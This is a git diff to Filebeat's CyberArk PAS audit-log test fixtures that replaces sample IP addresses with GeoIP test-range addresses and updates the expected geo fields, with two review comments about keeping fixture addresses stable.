"cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating 
System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 03:12:18", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "event.action": "cpm reconcile password failed", "event.category": [ "iam" @@ -390,11 +389,11 @@ "error", "user" ], - "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 15847, + "log.offset": 15799, "log.syslog.priority": "7", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -403,7 +402,7 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.1.20", - "34.66.114.180" + "81.2.69.143" ], "related.user": [ "ELASTIC\\bart", 
@@ -449,11 +448,6 @@ "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 03:12:19", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "event.action": "cpm reconcile password failed", "event.category": [ @@ -476,7 +470,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 19810, + "log.offset": 19746, "log.syslog.priority": "7", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -504,7 +498,7 @@ { "@timestamp": "2021-03-15T12:57:13.000Z", "cyberarkpas.audit.action": "CPM Reconcile Password Failed", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", "cyberarkpas.audit.ca_properties.cpm_disabled": "(CPM)MaxRetries", "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "cyberarkpas.audit.ca_properties.cpm_status": "failure", 
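Review bot: The address 34.123.103.115 is kept in this hunk while its destination.geo.* fields are dropped, so the expectation now asserts on a GeoIP lookup miss rather than on a resolved location, whereas every other address touched by this commit was moved to a range that does resolve (67.43.156.x, 81.2.69.143). Presumably the miss is because the GeoIP test database used when regenerating has no entry for that block — worth confirming — but either way a routable public address is still embedded in the sample data and the expected output silently depends on that absence. I would replace it in the input log with another address from the same test ranges already used in these fixtures and regenerate, so the expectation stays stable across GeoIP database updates and no real-world host is left in the corpus. The enclosing JSON object starts and ends outside this hunk.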
@@ -512,35 +506,36 @@ "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615813031", "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask", "cyberarkpas.audit.ca_properties.retries_count": "5", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart", "cyberarkpas.audit.desc": "CPM Reconcile Password Failed", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "5", "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T12:57:13Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Reconcile Password Failed", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 05:57:13", - "destination.address": "34.66.114.180", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 38.6583, - "destination.geo.location.lon": -77.2481, - "destination.geo.region_iso_code": "US-VA", - "destination.geo.region_name": "Virginia", - "destination.ip": "34.66.114.180", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "event.action": "cpm reconcile password failed", "event.category": [ "iam" @@ -558,11 +553,11 @@ "error", "user" ], - "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 23876, + "log.offset": 23812, "log.syslog.priority": "7", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -571,7 +566,7 @@ "observer.version": "11.7.0000", "related.ip": [ "10.0.1.20", - "34.66.114.180" + "81.2.69.143" ], "related.user": [ "ELASTIC\\bart", 
@@ -617,11 +612,6 @@ "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 06:04:27", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "event.action": "cpm reconcile password failed", "event.category": [ @@ -644,7 +634,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 27968, + "log.offset": 27888, "log.syslog.priority": "7", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -701,11 +691,6 @@ "cyberarkpas.audit.station": "10.0.1.20", "cyberarkpas.audit.timestamp": "Mar 15 07:44:37", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "event.action": "cpm reconcile password failed", "event.category": [ @@ -728,7 +713,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 32131, + "log.offset": 32051, "log.syslog.priority": "7", "network.direction": "outbound", "observer.hostname": "VAULT", diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log index 0d2f4d0e96ee..6569ebcaa91a 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log 
@@ -1,8 +1,8 @@ -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-11T16:50:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:29\n 2021-03-11T16:50:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PVWAAppUser\n Create File Version\n \n \n PSMSessions\n Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\n 10.0.1.20\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:29","IsoTimestamp":"2021-03-11T16:50:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PVWAAppUser","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.14\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-14T12:07:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:32\n 2021-03-14T12:07:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PasswordManager\n Create File Version\n \n \n AccountsFeedDiscoveryLogs\n Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\n 10.0.1.20\n \n \n \n \n \n Create File Version\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:32","IsoTimestamp":"2021-03-14T12:07:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PasswordManager","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"AccountsFeedDiscoveryLogs","File":"Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 81.2.69.143\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json index 0656cfa58ab5..9abceee6faea 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/62_create_file_version.log-expected.json @@ -10,7 +10,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMPLiveSessions", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:54", "event.action": "create file version", "event.code": "62", 
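Review bot: Nothing in the fixture or alongside it records why the Station values were changed to 67.43.156.12, 67.43.156.14 and 81.2.69.143, so the next sample added here with an arbitrary public address will either embed a real host or produce geo fields that shift when the GeoIP database is updated. These look like addresses chosen because they resolve in the GeoIP test database used to regenerate the expected files — TODO confirm. A short note in the test directory's README along the lines of `Sample IPs must be taken from the ranges the GeoIP test database covers (see the addresses already used in these fixtures); never use real customer or cloud addresses` would make the constraint explicit for future fixture authors.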
@@ -30,19 +30,16 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -59,7 +56,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMNotifications", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 09:58:05", "event.action": "create file version", "event.code": "62", 
@@ -72,26 +69,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 664, + "log.offset": 663, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -108,7 +102,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMLiveSessions", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 10:46:47", "event.action": "create file version", "event.code": "62", 
@@ -121,26 +115,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 1284, + "log.offset": 1282, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -157,7 +148,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMLiveSessions", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "35.192.121.42", + "cyberarkpas.audit.station": "67.43.156.12", "cyberarkpas.audit.timestamp": "Mar 10 14:20:12", "event.action": "create file version", "event.code": "62", 
@@ -170,25 +161,23 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 1912, + "log.offset": 1909, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "35.192.121.42" + "67.43.156.12" ], "service.type": "cyberarkpas", - "source.address": "35.192.121.42", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "35.192.121.42", + "source.address": "67.43.156.12", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cyberarkpas.audit", "forwarded" @@ -219,7 +208,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 2550, + "log.offset": 2546, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", 
